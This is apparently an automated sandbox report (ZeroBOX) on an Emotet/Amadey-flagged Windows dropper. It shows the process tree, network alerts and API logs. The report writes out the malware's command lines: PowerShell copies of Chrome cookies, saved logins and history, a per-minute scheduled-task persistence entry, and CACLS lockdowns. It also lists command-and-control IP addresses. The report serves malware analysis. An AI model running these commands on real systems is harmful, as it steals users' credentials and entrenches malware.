Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 30, 2023, 4:27 p.m.	March 30, 2023, 4:33 p.m.

Size	990.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`1a5f749669d8b3a12463fdf8b7cc3f83`
SHA256	`6b0d20593ca6a380401a682b5c6a407ed08ace59410a4b1e8fe034f1ccced0f7`
CRC32	`2E271F91`
ssdeep	`12288:OMruy90EqsO5WE5kQRk67bgm1Nekt5Yvj12dL/D1huYs4Zqg2eU11gNYzIkWdXIH:8yhEbkkk8bjA8v1Pgjf11gNYz4X/I`
PDB Path	wextract.pdb
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file IsPE32 - (no description) PE_Header_Zero - PE File Signature Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

lega.exe "C:\Users\test22\AppData\Local\Temp\lega.exe"
1704
- zap6859.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\zap6859.exe
  2132
  - zap9306.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\zap9306.exe
    2176
    - zap5462.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\zap5462.exe
      2244
      - tz9648.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\tz9648.exe
        2312
      - v7412DB.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\v7412DB.exe
        2756
    - w78XP44.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\w78XP44.exe
      2804
  - xnmXr68.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\xnmXr68.exe
    2856
- y53BD64.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y53BD64.exe
  2088
  - oneetx.exe "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe"
    1208
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F
      2120
    - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit
      2512
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2784
      - cacls.exe CACLS "oneetx.exe" /P "test22:N"
        2840
      - cacls.exe CACLS "oneetx.exe" /P "test22:R" /E
        2216
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2412
      - cacls.exe CACLS "..\c5d2db5804" /P "test22:N"
        2720
      - cacls.exe CACLS "..\c5d2db5804" /P "test22:R" /E
        3016
    - 123dsss.exe "C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe"
      2904
    - Tarlatan.exe "C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe"
      2188
      - Tarlatan.exe C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe
        2484
    - Gmeyad.exe "C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe"
      2876
    - 2023.exe "C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe"
      2716
      - cmd.exe cmd.exe /c "wmic csproduct get uuid"
        2292
        
        WMIC.exe wmic csproduct get uuid
        2264
      - WMIC.exe wmic os get Caption
        184
      - cmd.exe cmd /C "wmic path win32_VideoController get name"
        2344
        
        WMIC.exe wmic path win32_VideoController get name
        288
      - cmd.exe cmd /C "wmic cpu get name"
        2868
        
        WMIC.exe wmic cpu get name
        1780
      - cmd.exe cmd "/c " systeminfo
        2300
        
        systeminfo.exe systeminfo
        2992
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\test22\AppData\Local\Temp\XVlBzgbaiC\""
        3140
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies\" \"C:\Users\test22\AppData\Local\Temp\MRAjWwhTHc\""
        3300
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\tcuAxhxKQFDaFpL\""
        3404
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\test22\AppData\Local\Temp\SjFbcXoEFf\""
        3508
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\RsWxPLDnJObCsNV\""
        3608
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\test22\AppData\Local\Temp\lgTeMaPEZQ\""
        3704
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\leQYhYzRyWJjPjz\""
        3800
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\test22\AppData\Local\Temp\pfRFEgmota\""
        3896
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\FetHsbZRjxAwnwe\""
        3992
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\krBEmfdzdc\""
        4088
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\EkXBAkjQZLCtTMt\""
        2504
      - powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Microsoft\Windows\History\" \"C:\Users\test22\AppData\Local\Temp\TCoaNatyyi\""
        1480
    - w.exe "C:\Users\test22\AppData\Local\Temp\1000012001\w.exe"
      1684
    - tmpBEB8.exe "C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe"
      3032
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
      3356
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
bitcoin.org	A 104.22.68.176 A 104.22.69.176 A 172.67.40.154	172.67.40.154
download.electrum.org	A 104.21.89.144 A 172.67.160.221	104.21.89.144
downloads.exodus.com	A 104.18.18.218 A 104.18.19.218	104.18.18.218

IP Address	Status	Action
104.18.19.218	Active	Moloch
164.124.101.2	Active	Moloch
172.67.160.221	Active	Moloch
172.67.40.154	Active	Moloch
176.113.115.145	Active	Moloch
185.246.221.126	Active	Moloch
193.233.20.36	Active	Moloch
199.115.193.116	Active	Moloch
212.87.204.93	Active	Moloch
66.42.108.195	Active	Moloch
45.33.6.223	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49182 -> 193.233.20.36:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 193.233.20.36:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 193.233.20.36:80 -> 192.168.56.103:49182	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.233.20.36:80 -> 192.168.56.103:49182	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 193.233.20.36:80 -> 192.168.56.103:49182	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 193.233.20.36:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 193.233.20.36:80 -> 192.168.56.103:49182	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 193.233.20.36:80 -> 192.168.56.103:49182	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 193.233.20.36:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.103:49190 -> 185.246.221.126:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 185.246.221.126:80 -> 192.168.56.103:49190	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.246.221.126:80 -> 192.168.56.103:49190	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.246.221.126:80 -> 192.168.56.103:49190	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 104.18.19.218:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 104.18.19.218:443 -> 192.168.56.103:49197	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49199 -> 172.67.160.221:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49195 -> 104.18.19.218:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49182 -> 193.233.20.36:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.103:49182 -> 193.233.20.36:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 193.233.20.36:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 185.246.221.126:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.103:49190 -> 185.246.221.126:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49190 -> 185.246.221.126:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 172.67.40.154:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49199 172.67.160.221:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=*.electrum.org	76:1b:7b:1a:b2:a7:3f:c5:99:a7:2b:68:f5:fd:1b:a5:5e:97:4b:65
TLSv1 192.168.56.103:49194 172.67.40.154:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=*.bitcoin.org	1a:81:c6:0e:51:52:81:af:8a:1f:a8:fe:a3:18:04:fa:db:01:f5:3c

Queries for the computername (50 out of 133 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 30, 2023, 4:28 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (33 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 30, 2023, 4:27 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:27 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:28 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:29 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:29 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:29 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:29 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:29 p.m.			0	0
IsDebuggerPresent March 30, 2023, 4:29 p.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 30, 2023, 4:28 p.m.	buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW March 30, 2023, 4:28 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW March 30, 2023, 4:28 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA March 30, 2023, 4:28 p.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 555 events)

Time & API	Arguments	Status	Return
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7000 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b6f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b6f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b6f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b6f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b6f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b6f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b6f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008b7800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3168 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3168 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3168 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3168 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a31e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a31e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a30e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a30e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a30e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a30e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a30e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3168 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3168 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3368 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a3aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a37a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f81f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f81f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f81f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f81f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 30, 2023, 4:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f8178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
